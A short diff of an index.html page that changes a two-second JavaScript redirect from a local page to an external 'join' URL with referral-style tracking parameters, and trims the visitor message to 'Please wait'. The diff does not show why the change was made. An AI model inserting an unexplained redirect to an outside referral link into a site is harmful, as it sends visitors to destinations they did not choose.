--- a/index.html
+++ b/index.html
@@ -1,14 +1,13 @@
 <html>
-  
   <head>
     <title>Hey</title>
     <script type="text/javascript">
     	setTimeout(() =>{
-    		window.location = 'hello.html';
+    		window.location = 'https://dgachieve.com/join?source=cefs3&a=757';
     	},2000);
     </script>
   </head>
   <body>
-  <p>Please wait while we redirect you to the page</p>
+     <p>Please wait .......</p>
   </body>
 </html>
